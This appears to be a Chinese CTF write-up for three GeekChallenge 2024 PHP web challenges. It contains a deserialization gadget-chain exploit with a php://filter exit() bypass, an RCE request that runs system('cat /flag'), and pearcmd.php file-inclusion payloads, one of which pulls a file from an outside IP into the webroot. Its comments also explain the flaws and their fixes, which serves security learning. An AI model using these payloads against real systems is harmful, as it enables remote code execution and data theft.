ez_pop
题目:
| <?php
Class SYC{
    // Path (or stream-wrapper URL) handed to file_put_contents() in __call().
    // Once the object comes out of unserialize() this value is attacker-controlled.
    public $starven;
    // Fires on any call to a method SYC does not define (Geek::__toString() calls
    // ->Getflag() on whatever sits in its $GSBP, so a SYC there lands here).
    public function __call($name, $arguments){
        // Deny-list of php://filter conversion names applied to the raw string. A deny-list
        // on a wrapper path is not a safe boundary: it only blocks the names it enumerates
        // (the write filter used in the writeup's payload is not among them).
        if(preg_match('/%|iconv|UCS|UTF|rot|quoted|base|zlib|zip|read/i',$this->starven)){
            die('no hack');
        }
        // The "<?php exit();" prefix is meant to make the written file inert; with a
        // php://filter write chain on the path that prefix can be stripped before the
        // bytes hit disk. Mitigation is an allow-list of writable paths (no wrappers),
        // never a pattern over an attacker-supplied path.
        file_put_contents($this->starven,"<?php exit();".$this->starven);
    }
}
Class lover{
    // Passed to file_get_contents() in __destruct(); stream wrappers are resolved, so a
    // data:// URL carrying the expected text satisfies the comparison without any file.
    public $J1rry;
    // Object whose undefined ->source is read in __destruct() and which is echoed by __invoke().
    public $meimeng;
    // Runs when the unserialized graph is destroyed: the entry point of the gadget chain.
    public function __destruct(){
        // Loose == against the fetched contents; file_get_contents() on an attacker-chosen
        // string is itself an SSRF/LFI sink regardless of what the comparison checks.
        if(isset($this->J1rry)&&file_get_contents($this->J1rry)=='Welcome GeekChallenge 2024'){
            echo "success";
            // Reading a property that does not exist dispatches to __get() when $meimeng is a Geek.
            $this->meimeng->source;
        }
    }
    // Reached when a lover instance is used as a callable (Geek::__get() does `$Challenge()`).
    // echo on an object invokes that object's __toString().
    public function __invoke()
    {
        echo $this->meimeng;
    }
}
Class Geek{
    // Used as a callable in __get() and as the receiver of ->Getflag() in __toString().
    public $GSBP;
    // Triggered by reading an inaccessible property (lover::__destruct() reads ->source).
    public function __get($name){
        $Challenge = $this->GSBP;
        // Calling an object as a function invokes its __invoke().
        return $Challenge();
    }
    // Triggered when a Geek is echoed (lover::__invoke()). Calling a method the target
    // object does not define routes into that object's __call().
    public function __toString(){
        $this->GSBP->Getflag();
        return "Just do it";
    }
}
// Request handler: attacker-controlled input goes straight into unserialize().
// $_GET['data'] is read without isset(), so a request lacking the parameter emits an
// undefined-index notice (and a value of "0" is treated as absent by the truthiness test).
// The /meimeng/i check is a deny-list over the raw serialized string; it does not address
// the root issue, which is deserializing untrusted data at all. The defensive fix is to
// exchange data as JSON (json_decode) or, if the format must stay, to call
// unserialize($data, ['allowed_classes' => false]) so no application class is instantiated.
if($_GET['data']){
    if(preg_match("/meimeng/i",$_GET['data'])){
        die("no hack");
    }
    unserialize($_GET['data']);
}else{
    highlight_file(__FILE__);
}
exp:
<?php
// Minimal stand-in for the challenge's SYC: only the property is needed for serialize().
Class SYC{
    public $starven;
}
// Minimal stand-in for the challenge's lover; no methods are needed to produce the payload.
Class lover{
    public $J1rry;
    public $meimeng;
}
// Minimal stand-in for the challenge's Geek.
Class Geek{
    public $GSBP;
}
// Wires the object graph so that, on the server, each magic method hands off to the next:
// lover::__destruct() -> file_get_contents(data://...) -> Geek::__get() -> lover::__invoke()
// -> echo Geek -> Geek::__toString() -> SYC::__call() -> file_put_contents() on the
// php://filter path, and prints the serialized form.
$a = new lover;
// data:// satisfies the equality check in __destruct() without a file on disk.
$a->J1rry = "data://text/plain,Welcome GeekChallenge 2024";
$a->meimeng = new Geek;
$a->meimeng->GSBP = new lover;
$a->meimeng->GSBP->meimeng = new Geek;
$a->meimeng->GSBP->meimeng->GSBP = new SYC;
// The write filter strips the "<?php exit();" prefix the sink prepends; the written
// .htaccess then auto-prepends /flag. None of the filter names match the sink's deny-list.
$a->meimeng->GSBP->meimeng->GSBP->starven = "php://filter/write=string.strip_tags/?>php_value auto_prepend_file /flag\n#/resource=.htaccess";
echo serialize($a);
?>
<?php
// Helper: enumerates strings "%<n1>%<n2>" for decimal n1, n2 in 0..255 and prints those whose
// double urldecode() loosely equals $char. Note the numbers are concatenated in decimal, not
// hex, so many generated strings are not well-formed percent-escapes and decode unchanged.
$char = 'r';
for ($ascii1 = 0; $ascii1 < 256; $ascii1++) {
    for ($ascii2 = 0; $ascii2 < 256; $ascii2++) {
        $aaa = '%'.$ascii1.'%'.$ascii2;
        if(urldecode(urldecode($aaa)) == $char){
            echo $char.': '.$aaa;
            echo "\n";
        }
    }
}
?>
参考:php死亡exit()绕过 - xiaolong’s blog
谈一谈php://filter的妙用 | 离别歌
rce_me
| POST /?year=2e4&purpose=rce&code=system(%27cat%20/flag%27); HTTP/1.1
start=start+now&_%5B2024.geekchallenge.ctf=10932435112
ez_include
/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/xxxx.php
| 2. ``` http://80-75358d89-4e87-4ab7-a7a7-28f0b1348f7f.challenge.ctfplus.cn//levelllll2.php?syc=/usr/local/lib/php/pearcmd.php&+install+--installroot=/var/www/html+http://74.226.231.77/info.php --installroot=/var/www/html 可以写成 -R /var/www/html
上面是出网时的payload,不出网时:
1
| GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1
参考p神的文章:Docker PHP裸文件本地包含综述 | 离别歌